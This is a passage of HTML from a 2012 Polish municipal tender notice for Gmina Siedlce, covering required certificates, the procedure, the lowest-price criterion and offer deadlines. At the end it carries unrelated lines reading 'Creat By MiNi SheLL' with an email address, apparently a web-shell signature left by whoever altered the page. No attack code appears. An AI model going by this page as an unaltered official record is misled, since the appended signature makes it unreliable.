<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminasiedlce.pl      www.siedlcegw.e-bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Siedlce, ulica Asłanowicza 10, 08-110 Siedlce pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2012 godzina 09:30, miejsce: Urząd Gminy Siedlce, ulica Asłanowicza 10, 08-110 Siedlce pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com